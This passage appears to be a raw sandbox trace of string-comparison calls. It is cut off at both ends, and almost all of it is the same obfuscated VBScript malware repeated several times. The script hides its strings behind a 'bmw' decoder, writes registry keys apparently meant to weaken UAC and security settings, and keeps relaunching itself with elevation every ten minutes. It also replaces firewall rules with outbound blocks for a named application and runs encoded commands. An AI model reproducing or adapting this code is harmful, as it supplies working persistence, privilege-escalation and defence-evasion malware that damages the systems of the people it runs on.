00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.326] wcsncmp (_String1="OL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 66 [0226.326] wcsncmp (_String1="L_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 63 [0226.326] wcsncmp (_String1="_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 82 [0226.326] wcsncmp (_String1="TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.326] wcsncmp (_String1="CP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = 